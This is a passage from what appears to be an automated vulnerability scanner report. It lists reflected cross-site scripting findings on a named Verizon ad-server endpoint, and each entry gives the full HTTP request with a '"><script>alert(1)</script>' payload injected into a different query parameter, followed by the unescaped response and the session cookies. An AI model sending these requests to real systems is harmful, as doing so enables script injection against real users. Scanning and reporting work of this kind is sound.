GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=476c8"><script>alert(1)</script>1cd684a7591&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:52:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1362
Content-Type: text/html
Cache-Control: private
Content-Length: 1362

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=476c8"><script>alert(1)</script>1cd684a7591&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.585. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popcity parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the popcity request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ae33"><script>alert(1)</script>082704e552e was submitted in the popcity parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=3ae33"><script>alert(1)</script>082704e552e&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:50:14 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ealMedia/ads/click_lx.ads/vzsurround2.net/homepage/L24/569197284/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=3ae33"><script>alert(1)</script>082704e552e&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=
...[SNIP]...

2.586. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popcounty parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the popcounty request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db20a"><script>alert(1)</script>ad98c8a48bd was submitted in the popcounty parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=db20a"><script>alert(1)</script>ad98c8a48bd&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:51:04 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
und2.net/homepage/L24/216072555/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=db20a"><script>alert(1)</script>ad98c8a48bd&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&w
...[SNIP]...

2.587. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popdma parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the popdma request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 671eb"><script>alert(1)</script>2aafe3d0cfd was submitted in the popdma parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=671eb"><script>alert(1)</script>2aafe3d0cfd&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:51:20 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
/homepage/L24/920753079/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=671eb"><script>alert(1)</script>2aafe3d0cfd&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhostin
...[SNIP]...

2.588. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popindicator parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the popindicator request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21fa6"><script>alert(1)</script>3ed604c7372 was submitted in the popindicator parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=21fa6"><script>alert(1)</script>3ed604c7372&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:49:49 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1362
Content-Type: text/html
Cache-Control: private
Content-Length: 1362

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ne.com/RealMedia/ads/click_lx.ads/vzsurround2.net/homepage/L24/1588911915/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=21fa6"><script>alert(1)</script>3ed604c7372&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_
...[SNIP]...

2.589. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popip parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the popip request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e33f3"><script>alert(1)</script>46c97c97412 was submitted in the popip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=e33f3"><script>alert(1)</script>46c97c97412&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:49:33 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1362
Content-Type: text/html
Cache-Control: private
Content-Length: 1362

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
al.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net/homepage/L24/1866239870/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=e33f3"><script>alert(1)</script>46c97c97412&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&au
...[SNIP]...

2.590. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popservice parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the popservice request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 289de"><script>alert(1)</script>a27e6e3596 was submitted in the popservice parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=289de"><script>alert(1)</script>a27e6e3596&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:51:36 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1358
Content-Type: text/html
Cache-Control: private
Content-Length: 1358

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
4/997221546/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=289de"><script>alert(1)</script>a27e6e3596&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb
...[SNIP]...

2.591. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popstate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the popstate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1949"><script>alert(1)</script>a3917a638a8 was submitted in the popstate parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=d1949"><script>alert(1)</script>a3917a638a8&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:50:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ds/click_lx.ads/vzsurround2.net/homepage/L24/218393888/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=d1949"><script>alert(1)</script>a3917a638a8&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&onli
...[SNIP]...

2.592. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [popzipcode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the popzipcode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94696"><script>alert(1)</script>f2fcdc1fb36 was submitted in the popzipcode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=94696"><script>alert(1)</script>f2fcdc1fb36&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:50:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ads/vzsurround2.net/homepage/L24/242581337/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=94696"><script>alert(1)</script>f2fcdc1fb36&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&s
...[SNIP]...

2.593. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [prizm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the prizm request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56d47"><script>alert(1)</script>810ed66b159 was submitted in the prizm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=56d47"><script>alert(1)</script>810ed66b159&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:52:09 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1362
Content-Type: text/html
Cache-Control: private
Content-Length: 1362

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=56d47"><script>alert(1)</script>810ed66b159&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex
...[SNIP]...

2.594. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [pts parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the pts request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 862d1"><script>alert(1)</script>ce12940af71 was submitted in the pts parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=862d1"><script>alert(1)</script>ce12940af71&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
